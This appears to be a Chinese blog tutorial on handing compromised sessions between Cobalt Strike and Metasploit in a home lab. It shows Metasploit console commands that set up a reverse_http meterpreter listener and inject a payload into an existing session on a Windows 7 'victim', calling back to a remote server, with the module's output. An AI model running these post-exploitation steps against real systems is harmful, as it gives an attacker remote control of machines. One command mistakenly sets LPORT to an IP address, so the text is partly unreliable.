List

  1. 环境介绍
  2. Cobalt Strike 派会话到 Msf
  3. Msf 派会话到个人服务器的 Cobalt Strike

Tips: 文章内容存在Gif文件,请网页加载完成后阅读此文。


0x1 环境介绍

1.1 个人服务器

操作系统:Centos 7
IP:39.100.233.99 。
说明:挂载 Cobalt Strike 服务端。

1.2 局域网

1.物理机
网络:WIFI,通外网。
操作系统:Mac OS
IP:192.168.2.221 。
说明:挂载 MSF 控制端 和 Cobalt Strike 服务端。

2.虚拟机
网络:桥接 WIFI,通外网。
操作系统:Windows 7(x64)
IP:192.168.2.240 。
说明:受害机。


0x2 Cobalt Strike 派会话到 Msf

2.1 MSF 设置监听

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf5 exploit(multi/handler) > set LHOST 192.168.2.221
LHOST => 192.168.2.221
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > run

79476-i9e83y5j84e.png

2.2 Cobalt Strike 监听器配置

如下在 Mac 物理机运行 Cobalt Strike 服务端和客户端,生成木马使 Windows 7 正常上线。

87465-uuagpq7so2.png

beaconCS 内置监听器,当我们在目标系统成功执行 payload 以后,会弹回一个 beaconshellCS

foreign 主要是提供给外部使用的一些监听器,比如派一个 meterpreter 会话到 MSF

May-15-2020 16-37-33.gif

增加会话选中新添加的(MSF)监听器即可。

May-15-2020 16-40-20.gif


0x3 Msf 派会话到 Cobalt Strike

Cobalt Strike 客户端设置好监听器。

74189-wzaovyd4ou.png

msf5 exploit(windows/local/payload_inject) > use exploit/windows/local/payload_inject
msf5 exploit(windows/local/payload_inject) > set PAYLOAD windows/meterpreter/reverse_http
PAYLOAD => windows/meterpreter/reverse_http
msf5 exploit(windows/local/payload_inject) > set DisablePayloadHandler true
DisablePayloadHandler => true
msf5 exploit(windows/local/payload_inject) > set LPORT 39.100.233.99
LPORT => 39.100.233.99
msf5 exploit(windows/local/payload_inject) > set LPORT 8081
LPORT => 8081
msf5 exploit(windows/local/payload_inject) > set session 6
SESSION => 6
msf5 exploit(windows/local/payload_inject) > run

[*] Running module against PPBIBO-PC
[-] PID  does not actually exist.
[*] Launching notepad.exe...
[*] Preparing 'windows/meterpreter/reverse_http' for PID 3756

62010-c6m2na2epkg.png

成功上线,也可以上线到物理机 Mac 上的 CS,只要可以通信就可以。

标签: 安全工具

仅有一条评论

  1. luux8c

    太棒了,又学到了!

添加新评论

marisa.png